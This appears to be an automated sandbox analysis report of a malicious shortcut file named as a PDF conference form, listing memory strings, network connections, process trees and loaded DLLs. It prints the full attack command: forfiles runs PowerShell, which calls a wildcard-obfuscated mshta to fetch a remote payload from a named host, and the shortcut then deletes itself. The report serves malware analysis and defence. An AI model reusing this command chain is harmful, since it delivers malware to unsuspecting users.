Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-includes/wlwmanifest.xml
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/wp-json/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/xmlrpc.php
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.ua/xmlrpc.php?rsd
Source: mshta.exe, 00000003.00000002.2953889531.0000018407925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gurt.duna.uasearch_desc_varianttaxonomy_compatibilitysearch_by_full_wordview_text_lengthsku_
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000002.00000002.1731496106.00000226019EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.0000022610080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://schema.org
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-PTB9RGG
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
Source: mshta.exe, 00000003.00000003.1823467641.0000018407A7E000.00000004.00000020.00020000.00000000.sdmp, front[1].css0.3.dr	String found in binary or memory: https://www.svgrepo.com/vectors/search/4
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yoast.com/wordpress/plugins/seo/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 61715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61718
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61717
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 61718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: T15hf0Y3mp.lnk

LNK file: /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: unknown	Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \i\2\mshe https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \i\2\mshe https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \i\2\mshe https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2	Jump to behavior

Source: C:\Windows\System32\forfiles.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
